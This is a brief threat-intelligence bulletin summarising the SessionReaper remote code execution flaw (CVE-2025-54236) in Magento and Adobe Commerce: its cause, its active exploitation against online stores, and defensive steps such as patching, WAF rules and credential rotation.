Magento SessionReaper Exploit Targets Thousands of E-Commerce Sites
A remote code execution vulnerability dubbed 'SessionReaper' (CVE-2025-54236) in Magento and Adobe Commerce enables attackers to hijack live customer sessions and, in some configurations, achieve full server control. The root cause involves unsafe handling of serialized session data and improper input validation in session-related endpoints. After a proof-of-concept was published, attackers rapidly weaponized the flaw; researchers reported hundreds of stores compromised within 24 hours and estimated many merchants remain unpatched. The practical impact ranges from customer account takeover and payment card skimming to full-site compromise and data exfiltration. Vendors released patches shortly after disclosure, but the high rate of unpatched instances combined with public exploit code means this is an active exploitation scenario.
CORTEX Protocol Intelligence Assessment
Business Impact: Critical for online retailers customer payment data and PII exposure, plus brand and revenue impact. Technical Context: Unsafe deserialization of session objects facilitates authentication bypass and remote command execution.
Strategic Intelligence Guidance
- Apply vendor patches for Magento/Adobe Commerce immediately and verify integrity of backups.
- Deploy WAF rules targeting session endpoints and monitor for abnormal session creation.
- Scan for injected skimmer scripts and validate payment flows.
- Rotate admin and API credentials and enforce least privilege for store management.
CVEs
Vendors
Threats
Targets
Intelligence Source: Thousands of online stores at risk as SessionReaper attacks spread | Malwarebytes | Oct 24, 2025